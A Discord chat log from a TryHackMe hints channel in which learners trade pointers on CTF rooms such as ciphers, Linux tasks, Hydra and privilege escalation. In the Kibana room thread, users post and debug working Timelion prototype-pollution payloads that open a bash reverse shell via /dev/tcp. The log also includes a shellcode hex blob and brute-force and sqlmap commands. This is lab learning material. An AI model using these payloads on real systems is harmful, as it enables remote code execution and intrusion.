#room-hints

@final mortar it has nothing on the questions I want to ask

and the creator has no social medias, not in discord :/

I mean all you can do it wait 😕 Every people answering here is voluntary and if they don't know something, they can't answer something. So be patient ig 🙂

try the .git directory
@final mortar I'm a beginner to this, so all I have is an IP XD
What topics should I read up to understand how to traverse the trees?
I know very basic git commands, like cloning and adding/commiting/merges

yes right, cz this gave me headache to be honest, been trying for like 4 or 5 hours,

@final mortar I'm a beginner to this, so all I have is an IP XD
What topics should I read up to understand how to traverse the trees?
I know very basic git commands, like cloning and adding/commiting/merges
@real storm There is literally a directory called .git for git version control

Which is present in the folder which is a repo, yeah...
Umm how do I explain myself lol

@real storm research how to download and interact with a git repo from a .git directory

@real storm research how to download and interact with a git repo from a .git directory
@oblique cliff Okay, lemme look that up. Thanks!

@oblique cliff have you (by any chance) solved the crypto fun house?

Nein

😦 😦 😦 😦 😦

Can you please stop tagging everyone that shows up in #room-hints 😬

Just try at a later time

@final mortar lost hope mate 😦

Aren't there any writeups ?

thats the problem, no writeups, the creator is not on discord, no twitter, linkedIn, github

the only writeup, has no solution to where I am stuck

Where are you stuck

Let’s see if daddy can help just by looking at it

im daddy

here, the question says that we need to use 'Frequency Analysis'

I haven't encountered any crypto challenges on THM yet o.o
Are they fun?

@chrome heron I’m on my phone can you DM me that text so I can copy pasta

and that's what I've done, I even tried the closet letter to make sense

yes ofc

SMJ YEOYVLUO UOOUWRJGJWS ZI SMJ UKJD ZI SMJ XEIIJOJWYJ JWREWJ OZVWX LUORJ YJWSOUL HMJJLD LJX SZ SMJ GZDS JKSJWXJX POZDPJYSD. SMJ HMZLJ ZI UOESMGJSEY WZH UPPJUOJX HESMEW SMJ ROUDP ZI GJYMUWEDG. U CURVJ RLEGPDJ JCJW ZI UW UWULTSEYUL JWREWJ US LJWRSM ZPJWJX ZVS, UWX E PVODVJX HESM JWSMVDEUDG SMJ DMUXZHT CEDEZW. SMJ XOUHEWRD UWX SMJ JKPJOEGJWSD HJOJ ZI SMJ GZDS YZDSLT FEWX. XOUISDGJW ZI SMJ MERMJDS ZOXJO HJOJ WJYJDDUOT SZ JYZWZGEQJ SMJ LUAZVO ZI GT ZHW MJUX; HMELDS DFELLJX HZOFGJW HJOJ OJNVEOJX SZ JKJYVSJ SMJ JKPJOEGJWSUL GUYMEWJOT SZ HMEYM E HUD ZALERJX YZWDSUWSLT SZ MUCJ OJYZVODJ.

EW ZOXJO SZ YUOOT ZVS GT PVODVESD DVYYJDDIVLLT, E MUX PVOYMUDJX U MZVDJ HESM UAZCJ U NVUOSJO ZI UW UYOJ ZI ROZVWX EW U CJOT NVEJS LZYULEST. GT YZUYM-MZVDJ HUD WZH YZWCJOSJX EWSZ U IZORJ UWX U IZVWXOT, HMELDS GT DSUALJD HJOJ SOUWDIZOGJX EWSZ U HZOFDMZP. E AVELS ZSMJO JKSJWDECJ HZOFDMZPD GTDJLI, UWX MUX U IEOJ-POZZI AVELXEWR IZO GT XOUHEWRD UWX XOUISDGJW. MUCEWR GTDJLI HZOFJX HESM U CUOEJST ZI SZZLD, UWX MUCEWR DSVXEJX SMJ UOS ZI YZWDSOVYSEWR JUYM ZI SMJG, E US LJWRSM LUEX ES XZHW UD U POEWYEPLJ—SMUS, JKYJPS EW OUOJ YUDJD, E HZVLX WJCJO XZ UWTSMEWR GTDJLI EI E YZVLX UIIZOX SZ MEOJ UWZSMJO PJODZW HMZ

@real storm yes they're, but some give you a hard headache :/

This may sound stupid since I haven't done any such challenges, but count the occurences of all characters and maybe sort them according to their freq?

Looks like a fun cryptography challenge.

@real storm if I do that, the word has no meaning :/

@ashen matrix yes it is, tho I've been stuck 😦

Hmm. Making an anagram out of those characters is out of the question.

I think I've worked out a few letters just looking at it

26 characters would give 26! combinations o.o

DM me and ill tell you what I think 3 of them may be?

I could be wrong. Haven't done the room in question

@ashen matrix okay bud

Caeser shift then count?

naah its not a rot13

Not a shift of 13

Like I see a single "U", which I could map to either I or A...

yes thats what I thought as well, have done it with both

you first need to establish that it's a simple substitution, which it isn't necessarily

and shift 13 is the rot13 or caeser

I meant shift k though

@slender nexus sorry did not understand

Like I see a single "U", which I could map to either I or A...
@real storm This holds for first para not second

https://www.dcode.fr/index-coincidence

Wait nvm it's there in the second too o.o

https://www.dcode.fr/frequency-analysis

Well, I'm sorry I can't be helpful here. I'll need to do some crypto stuff before I can approach these problems I guess

if the question stated frequency analysis it's probably an easy substitution

maybe with a period (Vigenère)

yes @slender nexus it did,

thats the closest match, if I do the substitution

nothing happens

and if I do the permutation nothing happens as well

still crypted

things aren't determined

you can't just expect to run a decipher.sh and get what you want

yes ofc, I played around with letters on my own

I mean there are such tools though, but not deterministic ones

yes I got your point, nothing is determined, I have played around with some letters

what is the Index of coincidence of your text ?

there is no period also

can't you see things like "SMJ" repeated all the timr

don't you know a frequent 3 letter word in English?

yes that lead to TNE, so i replaced the M->H instead of N

to make up THE

where does your TNE come from ?

and I did that for few other words, but if I fix one word, others will be runied

check the table

its based on the most frequent letters on that paragraph and, the most frequent letters on english

@final mortar whatever was happening with the previous box is now fixed with the restart. I now see the suggested user.

Thanks!

Awesome 🙂

Hello in Jeff CTF room I found the user.txt flag but it saying that it's incorrect but I'm sure that it's the right one because it's located in /home/Jeff folder

It's ok I found the way sorry 😁

@oblique cliff Okay, lemme look that up. Thanks!
You won't believe that I didn't even connect my VPN to THM this session and was scratching my head 😫

I guess git happens

Hi, can I have a tip on learning linux room, task 18, question №2??

I know I gotta echo something, but what is the variable?

@candid fiber research how to check the value of environment variables in linux

echo $USER/home?

it tells you the name of the variable

mm, alrighty

I'm stupid..

In the SSRF room , the exercise to find all open ports (throught SSRF), I did a small script that curl's each port and then depending on the grep result it increments a counter. tho this is super slow and will take a while to check all 65535 ports, idk if I did something wrong or I should optimize, really dont feel doing multi conccurent programming on bash

That only checks for HTTP?

I think so, unless I missed something, I need to pass to the attack parameter a url (or e.g. file:///etc/passwd)

Hi
someone finished this room ? im having trouble in last crackme..
https://tryhackme.com/room/introtox8664

@white salmon put breakpoints everywhere and check out what it does to your input

ahm..thx for the tip will try it

hi guys, i'm kinda stuck on the last task of the vulnversity room. i have access to the machine as a regular user and i'm supposed to use the SUID-enabled systemctl to gain root privileges. any hints?

GTFObins

thanks, i'll try to figure it out from that

@oblique cliff completed the room ahaha didn't realised a detail 🔙

😂 🧐

awesome 😄

Hey, I'm currently trying on Advent of Cyber and I'm already struggeling with the first real task.
I'm supposed to find out the name of the cookie used for authentication, but I absolutely have no idea how to do so.
Sadly, I dont have a subscription, so I cant do the Burp Suite Room. I did some research and managed to at least intercept the first request.
But nothing with cookies, sadly.
Any hints?

@low sequoia make sure to intercept the server responses

sure you'll find something there

Yeah, forgot that there was also a register page. After I was told I completed it in a few mins, thanks tho :D

you're welcome

hey all, can someone tip a hint on the Recovery v2 room regarding flag 5? I found the b-----.txt file with the (possible) keys to the xor encrypted web page but no luck.

@trail oar have you already decrypted the web files and put the decrypted ones back where they belong?

@short fox I did not. Since just a small part of the web page got decrypted using one of the keys i assumed it was a crypto challenge and ignored the rest of the box. I'll hop into it again, thanks. Also can you suggest more boxes like this one? It seems i found my favourite kind.

@short fox I did not. Since just a small part of the web page got decrypted using one of the keys i assumed it was a crypto challenge and ignored the rest of the box. I'll hop into it again, thanks. Also can you suggest more boxes like this one? It seems i found my favourite kind.
@trail oar Glad I could help. I haven’t seen another room quite like this one, but it was really fun.

And quite realistic i believe!! Very nice.

Any hints for Year of the Rabbit. I have access to the machine and have done horizontal privilege escalation. Bit stuck on where to go from there for root.

What privesc enumeration have you done already?

||Access to gwendoline, I have used vi to go into other accounts but I cant see anything special from each one, should I just try harder with each account?||

Have you ran a privesc enum script like linpeas?

I ran suid3num.py

ill run linpeas now ty

Im working on Blaster and there is no history available in IE's history tab, I'm not sure where to go from here, any hints? (tried looking around the file system for a deleted file but found nothing as well

#room-help pins if you just want the CVE. The user seached for "how to patch cve-xxxx-xxxxx"

Otherwise you can find the file and do research into it

ty

hey guys I need help with the room ignite
I got a reverse shell and I have upgraded it to tty. I couldn't escalate privileges.

I ran LinEnum.sh on the target nothing useful came out

@hazy lodge maybe try to look for some files!

hey, i need also help with the room "learn linux" i'm on the task 43 and does know how to upgrade access on files.

look for odd files readable by users you can log in as

ok thanks

I ran LinEnum.sh on the target nothing useful came out
@hazy lodge look closer. There’s something very useful in the output

Big hint || Shiba 2 before root ||

its encoded with ba....:||ObsJmP173N2X6dOrAgEAL0Vu|| what's ba.... ? base64 it's not becuase it couldnt decode it

It's a base close to 64

@foggy blaze

Next time give more info about the room and the task you are in, so we can help you better ! Lucky for you, I got stuck on this one myself x)

oh thanks i see well i wanted a small hint thats why i didnt want to give more info anyways thanks for your help

The name of the room and the task number just allow us to understand where you're at 😉

oh ok i will do it nextime

can someone give me a nudge on the internal room i have the first also i was able to get two users to get into ||phpmyadmin ||but don't have the privilege to spawn a shell
any hint will help pls

@nocturne herald #thm-community-media please

Hi

i can't enumerate user kerberos server room

already configure controller.local in etc/hosts

/kerbrute_linux_amd64 userenum --dc CONTROLLER.local -d CONTROLLER.local User.txt

so long time at this condition

anyone can suggest me

?

Can you ping the machine

Or scan it

which wrong config?

That's not the correct domain name

can't ping

And really you should be adding the machine as a DNS server in resolve.conf

ok

still can't

@stuck fractal what happened brother

Please don't call me brother. Your message was deleted as it needs to be in #thm-community-media rather than promoting it across multiple channels. Please read the rules, focussing on Rule 14.
@nocturne herald

@stuck fractal ohh sorry I didn't read it sorry it be my mistake

Hello, i need a little hint on the linux challenge room task flag 15. i find the krenel information but nothing? Thanks for the hlep

The hint tells us where to look

ho thanks

don't think about this hint ;)

still can't find

which is the correct wordlist for the room jack? I have tried rockyou, probable-v2-top207,top1575...

Maybe try a small one like fasttrack?

Worked like a charm thanks

In the attacktive Directory Room, there is one question where it asks what method is used to dump ntds.dit file in secrectsdump

self-note, try something small before bringing in rockyou

Isn't it -just-d c

?

No

Dump it and you'll be told what method it uses

Got it

Thanks

Think im gonna cry just lost a powershell script 😦 with 9 min on the erver and it shutdown

@short fox Solved it today, i was in the correct path but cyber chef didn't decode bytes correctly. I finally used a lower level tool to do the job. Thanks again.

@trail oar I’m glad I could help. Congrats!

anyone give me a hint , how to decode Diffie-Hellman ?

which room is this for?

@toxic scarab ||StuxCTF||

have you done any searches?

yes i got it

thanks man

guys any small hint? about Year of the Rabbit room. I found || sup3r_s3cret_fl4g/|| dir also || watched the video||

You realize you have been rickrolled, haven't you

So that's that, look for other ways, other directories maybe

You realize you have been rickrolled, haven't you
@final mortar hahaha yeah

ok ok thanks

So that's that, look for other ways, other directories maybe
i got nothing it has assets and that secret dir

The secret php is more that just that video

i see thanks

@foggy blaze try intercepting the redirect with burp

@foggy blaze try intercepting the redirect with burp
@oblique cliff thanks i did that

I was curious if this is the output that I'm supposed to get for Vulnveristy Task3

Sorry. Task 4

actually I was right the first time. Task 3. I guessed the answer, but I want to know what I'm looking at.

/room/networkservices
Task 4, question 8 :
I got the file, and been able to read it, but I acctually don't know what could I do with it :/

Is it because I did the chmod 600 [file] too early ?

@verbal vale you can use it for ssh

and make sure its owned by root

Yeah I believe so ..
But I don't know the username :/

Oh well

I downloaded the file once more and read it before chmod

And found the username

nice!

worked ! thanks

I was curious if this is the output that I'm supposed to get for Vulnveristy Task3
@stone oyster yep! Those are the valid directories found using the wordlist you chose for that webserver. If you go out to your browser and go to {ip}:3333/internal for example you’ll see it’s a valid subdirectory

ok. Thx

I wasn't sure last night what I was looking at. I reran with -e and started clicking

I see that there's a very blatant upload form.

Haha yep! That’s what you’re supposed to find 🙂

Any can give me hit about Wgel CTF

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

Someone could write me an hint for Break Out The Cage room? I'm at the beginning but I can't find paths to follow. I've already checked the ftp file but I can't understand how It is encoded. Also, I've found some hidden directories (|| scripts,images and auditions||). I've tried to find some hidden info in the png and jpg files but nothing
@mossy ermine

have you tried to do anything with the files you found in those directories?

also, have you tried to throw cyberchef at the encoded message?

also, have you tried to throw cyberchef at the encoded message?
@oblique cliff I seriously can't find the right encoding format in cyberchef, but I'll try again later. Also, I can't find data hidden via steganography (I tried with binwalk,exiftool and zsteg)

what kind of file is it?

its a common encoding method, look how it ends

I tried a lot of them, the most acceptable result is given by || base64 ||

yep

thats correcto

and then its been ||ciphered || in a common ||CTF cipher method||

particularly || a cipher that needs a key to decode||

and then its been ||ciphered || in a common ||CTF cipher method||
particularly || a cipher that needs a key to decode||

you were correct with ||base64||

the next step is what ive said above

Ok I'll work on that

!help

#bot-commands @rose cape

yo my bad

Nope but it's a valid pattern for finding a file

i am stuck in getting a shell in ice room by darkStar

it says exploit completed but no sessions created

Show me ze screenshot of your options command

Everything looks good might just have to run it again or reset the box

i have run it many times but it says the same thing

have even run updated my system

metasploit *

Terminate and redeploy the box like Cry suggested

ok

had redeployed but again same error

!vpnscript

having trouble enumerating abnormal service in hackpark. checked all running processes and looked inside program files x86 as per the hint. saw servicescheduler could not find anything with in it, been researching for over an hour, any nudges appreciated

found this https://www.exploit-db.com/exploits/45072

having trouble identifying service name it asks for

sc query lists services in Windows

yup got it thanks

so for kiba, do you need to change a lot of the poc code you can find in that CVE? to me it feels like it should work quite easily, but somehow i am too stupid to get it to work

hello

@thorny saffron had the same issue

i am solving simple ctf, and stuck at #3, asking for cve, tried entering all as far i find, not no one matches

someone please help me?

re install ur entire kali vm that’s what i’d do and it worked

help me

@bold rampart ||find the version of the software running on the server and the name of it and goolge it with CVE|| or read a write up too they can help big time

i search with cve but found nothing that match

i don't know i am entering right format or not

@4nqr34z @white salmon Ra2 room hint please. I've found the ||powershell url.|| Trying to do a ||nishang rev.ps1|| using the ||non-authenticated url|| am I on the right track? ||URL encode it after /logon.aspx?ReturnUrl=/powershell/.|| please help me Obi-Wan Kenobi you're my only hope 😄

I'm doing the Kibana room, know exactly what to do, it's just not working ;-;

I have the RCE code and changed what's needed, and started a nc session to get a reverse conneciton

*connection

But it's not executing, despite it being on the Timelion tab

I'm doing the Kibana room, know exactly what to do, it's just not working ;-;
@dusky osprey it happend to me too

restart the machine

I did

I went to Timelion, pressed the run button, went to Canvas, nothing happened

what payload are you using?

.es(*).props(label.proto.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//')
.props(label.proto.env.NODE_OPTIONS='--require /proc/self/environ')

yeah that payload didnt work for me too use another one

I saw the other one but I closed the tab earlier argh

go back for it xD

||.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("if [ ! -f /tmp/%s ];then touch /tmp/%s && /bin/bash -c \\'/bin/bash -i >& /dev/tcp/${LHOST}/${LPORT} 0>&1\'; fi");process.exit()//')||
||.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')||

Worked for me. Though, at some point I did just use curl, fwiw.

And that's all in one line of code right?

Yup.

And what did you used curl for?

oh wait

I didn't want to use the browser in my meek vm due to Kibana's ressource consumption.

Ahh fair enough

But yeah, I started doing a PoC for a metasploit exploit, but well, solved the room already :>

Timelion: SyntaxError: {"type":"incompleteFunction","function":"props","location":{"min":6,"max":12},"text":".props"}

I only knew it existed an hour ago because I was searching for rooms to do lol

Uhm, there might be a paren missing.

:<

Might have been the \n that did it.

Nopep

*Nope

Ah.

I see. I copied it from my PoC and there were some escaped characters.

I got it

.es().props(label.proto.env.AAAA='require("child_process").exec("bash -c 'bash -i>& /dev/tcp/******/12345 0>&1'");//')
.props(label.proto.env.NODE_OPTIONS='--require /proc/self/environ')

Have them as two seperate commands

Capabilities is a concept that provides a security system that allows "divide" root privileges into different values

0_0 wut..I've been searching this on Google with no luck

Is there something I'm not searching right?

ideas about this?
\xba\x60\x40\xf4\x45\xdd\xc0\xd9\x74\x24\xf4\x5b\x2b
\xc9\xb1\x48\x31\x53\x13\x03\x53\x13\x83\xc3\x64\xa2
\x01\xb9\x8c\xa0\xea\x42\x4c\xc5\x63\xa7\x7d\xc5\x10
\xa3\x2d\xf5\x53\xe1\xc1\x7e\x31\x12\x52\xf2\x9e\x15
\xd3\xb9\xf8\x18\xe4\x92\x39\x3a\x66\xe9\x6d\x9c\x57
\x22\x60\xdd\x90\x5f\x89\x8f\x49\x2b\x3c\x20\xfe\x61
\xfd\xcb\x4c\x67\x85\x28\x04\x86\xa4\xfe\x1f\xd1\x66
\x00\xcc\x69\x2f\x1a\x11\x57\xf9\x91\xe1\x23\xf8\x73
\x38\xcb\x57\xba\xf5\x3e\xa9\xfa\x31\xa1\xdc\xf2\x42
\x5c\xe7\xc0\x39\xba\x62\xd3\x99\x49\xd4\x3f\x18\x9d
\x83\xb4\x16\x6a\xc7\x93\x3a\x6d\x04\xa8\x46\xe6\xab
\x7f\xcf\xbc\x8f\x5b\x94\x67\xb1\xfa\x70\xc9\xce\x1d
\xdb\xb6\x6a\x55\xf1\xa3\x06\x34\x9d\x00\x2b\xc7\x5d
\x0f\x3c\xb4\x6f\x90\x96\x52\xc3\x59\x31\xa4\x24\x70
\x85\x3a\xdb\x7b\xf6\x13\x1f\x2f\xa6\x0b\xb6\x50\x2d
\xcc\x37\x85\xd8\xc7\x9e\x76\xff\x25\x4a\x76\x95\xd7
\xe2\x92\x66\x07\x12\x9d\xac\x20\xba\x60\x4f\x5e\x66
\xec\xa9\x0a\x86\xb8\x62\xa3\x64\x9f\xba\x54\x97\xf5
\x92\xf2\xd0\x1f\x24\xfc\xe1\x35\x02\x6a\x69\x5a\x96
\x8b\x6e\x77\xbe\xdc\xf8\x0d\x2f\xae\x99\x12\x7a\x5a
\x59\x87\x81\xcd\x0e\x3f\x88\x28\x78\xe0\x73\x1f\xf3
\x29\xe6\xe0\x6b\x56\xe6\xe0\x6b\x00\x6c\xe1\x03\xf4
\xd4\xb2\x36\xfb\xc0\xa6\xeb\x6e\xeb\x9e\x58\x38\x83
\x1c\x87\x0e\x0c\xde\xe2\x8e\x70\x09\xca\xe4\x98\x89

its not a room just for wants to know, could not get anything using hex

For those who want only hints on rooms

thought its a helpful community, I am seeking an information (on cyber security not football), but duh nvm

Usually those questions are for #general But you may get in trouble for spam so try sending it as a text file or screenshot?
I'm not a mod but I don't want you to get in trouble :3

whats the spam on that, its just some kind of cipher or dunno, thanks anyway I'll figure it out

Sending text walls in #general may be considered spam but as I said, I'm not a mod I just don't want you to get in trouble

thanks mate

0_0 wut..I've been searching this on Google with no luck
@dusky osprey search for priv esca by abusing capabilities

is the kibana timelion bugged?

the payload won't work

everyone says that

but it worked for me

i just had to restart the machine

uhm i'll try

and used a different payload from urs

i also tried to edit it but nothing changed

dont forget to open || canvas|| after running the payload

oh damn i just forgot about that

i didn't read that damn

i feel you these things happen to me too :((

damn i felt a bit stupid

hm so you guys changed a lot? tried both the github payloads for kiba

hm so you guys changed a lot? tried both the github payloads for kiba
@trail compass well the second payload worked for me

hm i guess i will try again later from a local vm instead of in browser vm. also tried wget or curl from the kibana to my machine and nothing to see

the restart i sadly tried already, but only once

oh k, for me it was the solution

Anthem:

is there any other way how to connect to RDP since Remmina and xfreerdp dont work for me?

are you connected to the vpn?

yes sir

rdesktop perhaps

tried above and had tcp_connect() error

oh

Remmina doesnt have Remote Desktop Protocol plugin, i tried to install it but i still dont have it in options

did you install by the official sites instructions?

yes

kool magic happened and rdesktop is working

Hello, I'm currently on kiba, I followed this article : ||https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/ I changed the ip and the port||
but when I run the exploit nothing happen :D

dont forget to open || canvas|| after running the payload
@slim mauve

I did it :/

Capabilities is a concept that provides a security system that allows "divide" root privileges into different values
@dusky osprey search linux capabilities priv

my solution was to restart the machine but you will waste a lot of time cuz it requires up to 7 minutes for each restart

Who are you talking to ?

you, i said my solution was to just restart the machine if it didn't work

you, i said my solution was to just restart the machine if it didn't work
Okay thanks, I tried but it didn't work, I'll try again

@heavy light this isn’t related to a room is it?

😅

Hi, im in the "Learn Linux" room and im confused on task 11. Its asking me to create a txt file named noot.txt, then run the binary to be given a password for a user, but I don't know what im supposed to do for this.... theres a note at the bottom that says the name of the binary is shiba1.

To run the binary?

"Once you're done run the binary and you'll be given the password for the user shiba2!"

What are you stuck on exactly?

[Task 11] Binary - Shiba1

Now that you've learned basic file operations, you can solve the first challenge! This challenge is pretty simple, create a file called noot.txt.

Once you're done run the binary and you'll be given the password for the user shiba2!

Note: the name of the binary is shiba1, as shown in the title
#1

What's the password for shiba2

i have no idea what its asking me to do...

Hi, im in the "Learn Linux" room and im confused on task 11. Its asking me to create a txt file named noot.txt, then run the binary to be given a password for a user, but I don't know what im supposed to do for this.... theres a note at the bottom that says the name of the binary is shiba1.
@gray cedar you said it right here

Make a file and run the binary

all i get is command not found though

Can you show a screenshot of how you’re trying to run it

Oof

You’re supposed to create the text file and run the binary

You’re supposed to create the text file and run the binary
@oblique cliff they're not on the box

Oh

Oof

Yea you have to ssh into the box first @gray cedar

wym?

Task... 4?

Yes.

Please go through task 4

On the sqli room task 8 last question it asks for the command that will dump out all the database on the same website (from the previous question I am guessing) when I input ||sqlmap -u sqli.thm/login.php -dump|| I get that it is incorrect. Now my question: is the website wrong? I tried to look for another website that would match the * provided on the field but no luck.

@oblique cliff so im not using a provided vm, im using my own on virtualbox... is that gunna prevent me from doing #4 then?

You need to connect to the VM provided

well crap. ok, thank you

You can do it from Kali

And really you should. Run your VPN directly in kali, SSH in.

i went through the welcome thing again to see what im doing wrong with that, but now i just feel like im messing something up

It's not related to the welcome room @gray cedar

Terminate the VM in the welcome room

Go to Learn Linux, deploy the VM, follow the section of task 4 that doesn't use putty.

And make sure you have the vpn running in a different terminal

thanks for helping me out. its just sitting at ssh: connect to host 10.10.195.227 port 22: Connection timed out

Do you have the vpn running

its goin right now... i think

It’s not

i figured out what im supposed to do with my original question, thank you

Hello. I think this is more "general" question about msf reverse shell. Why can't I get full TTY via "shell" command? Also I've tryes to type /bin/bash to get better shell, but nothing. Any ideas?

Well it's most likely because you're using metasploit but you should have a prompt. Is it outdated or is that just how it works on mac?

It's manjaro (arch based distro). Metasploit is up to date. Payload used to create shell - "java/jsp_shell_reverse_tcp".

Oh it's manjaro

The dots in the corner through me off haha

Haha, it's okay, you're not the first one :D

Well I use Manjaro and this also doesn't do this for me, possible the payload you're using?

This would be a good time for James to tune in and correct me

No context so I can't do much

Try looking at post/multi/manage/shell_to_meterpreter on the internet, may fix your issue

Thanks.

I'm working on task 21 of Learning Linux, and i'm checking to see if the environment variable test1234 exists... and it doesn't. i did a grep for shiba3 thinking there would be a similar file like in the previous user, but i've come up empty handed.

You need to make the variable and the file is called shiba4 I believe

im supposed to get the password for shiba3

This challenge is pretty simple. The binary is checking to see if the environment variable "test1234" exists, and if it's set equal to the current $USER environment variable.

Hey everyone, anyone who has completed the new OWASP juice shop room? Need help on task 7 #3

Try looking at post/multi/manage/shell_to_meterpreter on the internet, may fix your issue
@trim haven That helped! Thank you!

:D

@gray cedar So. You're told the condition that the binary will check. If the check passes, you get the password

Make the check pass

can someone give me a little hint on this one?

i tried to load page "app-administration" and "Administration", its not giving me back anything

Well, are you logged as an Admin?

yes

hmm

maybe its Admin not admin?

yeha nope. Admin is not a valid email

@stuck fractal i dont really know what that means... i did this tho and i have no idea if its right or not...

Did you try /administration

?

$user is case sensitive

1. Variables are case sensitive.
2. You're not running the binary so the check never happens

yeah

what binary am i supposed to be running...?

@patent token i ran Administration; administration; app-administration; app-Administration

what binary am i supposed to be running...?
@gray cedar You're told in the question

its all shows a white screen

You're logged in as the admin?

@chrome heron Hey, I'd say that's a bit more than a hint.

yeah I am

@stuck fractal really? thought it's just assigning variables

It's a key part of the task

message deleted

aaaww

my baad

thought he was trying to figure out how to assign a variable, like doing it with the IP so you dont have to type it multiple times

in the $ lesson, it doesnt actually say that i can or cant.. it sort of implies that im not to use $ when assigning a variable... i would have never thought of that. i did do export user=test1234 and then echo $user and then i got test1234 and nothing happened ._.

$ is used to access variables

well as he said,

@gray cedar it's not magic, you have assigned a variable with the value test1234, sure it will echo it,

may I ask what room is this?

https://tryhackme.com/room/zthlinux

Learning Linux, task21

Thanks!

woah somehow i got the #2's flag by useing a posion null byte accidentally

@gray cedar hint: case sensitive

Is this the reason why the page is not showing me anything ?

@chrome heron so i did the same thing except capitalize USER... still nothing

Did you actually run the binary?

same question

i still dont know what binary though

If you read the task and question, you're told

this is why i was having an issue:

why did you go to /?

thats where i was after i did su shiba2

the first time

/ is root directory

thats where i was after i did su shiba2
@gray cedar That doesn't happen

well idk why but the first thing i did after doing su shiba2 was ls and it gave me all that...

is room kiba open for hints?

I am stuck at RCE

hello, I'm doing hackivity "Blue" Task 5 [Find Flags]. I got the first flag by luck, now I'm doing the seond flag. I know the hint says, "I wish I wrote down where I kept my password. Luckily it's still stored here on Windows." so I infer that the file is stored in a temporary file, or backup file. I tried checking Recycle Bin and Recovery and cat the files, but they didn't give me anything useful. Any hints for the second flag?

Windows has to store the passwords somehow to be able to check them

Not as plaintext, but they're still "stored"

Find out where. Look there.

is room kiba open for hints?
@arctic crystal John's got a video on it going up in 45 mins

got it, that was a big hint

ty

im working on the last task for learn linux and im stuck. i gotta get a flag in /root/root.txt
ive tried giving shiba1-4 sudo privileges, using ln with and without -s, doing chmod and chown on the file and user respectively and finally ive tried cp/mv getting denied.

Those all need root

i figured that out already... idk how im supposed to get the root pw though

It's Ubuntu, there isn't normally a root password

._.

auth failure

With ubuntu, you can't log in as root

Unless you set a root password

imma just call it for the night... ive been at it for 8hrs

Look for a file that’s owned by a user that may be out of place

^^

thanks, imma write it down for now and just take a break till tomorrow

brain hurtey, need alcohol & nicotine

The best solution

or maybe sleep

sleep is a crutch

hints for flag3 of Blue? The hint says "You'll need to have elevated privileges to access this flag." I already have system account priviledges so that's not a problem. I know that the answer for flag2, which i can't say, says something about having elevated priviledges with the sam database. Is that unrelated?

It’s probably on the administrators desktop

hmm I can't find the admin desktop

there's no C:/Users/admin

only C:/Users/Jon

Administrator?

wdym

The username on windows is typically Administrator

But maybe jon is an administrator

k yea I found it ty I assumed too much, but I did not find it by checking everything. It was not in Desktop so I would've given up

but good thing I googled a command

this command finds any filename recursively in the whole directory structure what the heck all the hints were unnecessary

oh wait if they named it differently I would have no idea then

lol

I am stuck at RCE
@arctic crystal DM

Anyone, can help me with python challenge in learning path. I am new to python and stuck at decoding it. Thanks.

What do you have so far?

I decoded the first first para of base64 and the output is confusing as it is start from b'\xdf}\xf7\xdf}\xf7.....' and second round of decoding is not happing. the output is only b''

You want 3 for loops

Each loop does one stage of the decode process

Before going to loop I was troubleshooting the output of every round of base64 and then base32 and base16.

You're also importing weirdly

And you're randomly using base85

The outer layers are base16

Use 3 for loops...

yeah! I was reading doc. and I just wanted to try b85. Okay.

So, if I am not wrong outlayer is b16, b32 and then b64? each of them will be run in loop with range (0 ,4) ?

range(5)

Okay. I'll give it a try.

Thanks 🙂

@stuck fractal It did work for b16, so hopefully will work further.

ey, can somebody help me with this 2 questions ? : #5

What command lets you view advanced options for a specific module?
#6

How do you show options in a specific category

i ve searched a lot

but no answer

help plz

https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/

The answer is in the first google result for my query

really ?! maybe i didnt saw it

ill check

thx

metasploit view advanced options for module

That was all it took

i know, i did and i searched

i didnt see it

ill check better

show just shows stuff

Keep reading

Read the whole page

ok ok

Which task?

In fact, what room and task?

room CC: task 7 question: 6||

yess

i founded

xd

CC is a series of rooms

Please don't post answers here @balmy crystal

https://tryhackme.com/room/ccpentesting

ok

ill do

my apologizes

(guess that's how it writes)

ill remove the answers so

ow

thx

Hi guys

I'm trying Hydra room, and I have a question

I used this command to get the web password

hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.22.198 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V

but it took too long. the hint says it should be less than 30

Hello all. Hoping to get some help understanding flag27 in "linux challenges." I've read the write ups, and I know the commands to get the flag, but I still don't understand how to view which user is able to access the root flag, when logged in as a user who cannot access it

hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.22.198 http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V
@white salmon can you send a screenshot of the output?

@white salmon wrong path

@white salmon can you send a screenshot of the output?
@woven mirage

Capture a legitimate login request

Then use the path from that

it's working but the hint says "If you've tried more than 30 passwords from RockYou.txt, you are doing something wrong!"

It's not working

how it's not working? what's wrong to fix it?

Hello all. Hoping to get some help understanding flag27 in "linux challenges." I've read the write ups, and I know the commands to get the flag, but I still don't understand how to view which user is able to access the root flag, when logged in as a user who cannot access it
@thick apex If you type sudo -l you can see the commands you can execute as root

wrong path

@woven mirage Ah so you need to log in as each user and execute that command?

Well, It has been some time since i did this room but i'm pretty sure that you would be already in the right user by that point

But normally, Its Nice to check it everytime you get to a new user

wrong path
@stuck fractal But there isn't another RockYou.txt in my Kali. From where I should get it?

That's not what I mean

Capture a legitimate login request
Then use the path from that
@stuck fractal

You need to send your requests to the correct place

You need to send your requests to the correct place
@stuck fractal Solve it. Thanks

@woven mirage ahh good call, thanks!

super dumb question, but is there a way to see if other users have sudo ability? I guess that would be to OP though lol

Sometimes some sudoers files can be readable

ahh

thats the key, thanks James!

I'm fairly sure /etc/sudoers isn't readable by default

What parameter allows us to generate a POC(actual exploit)?😩

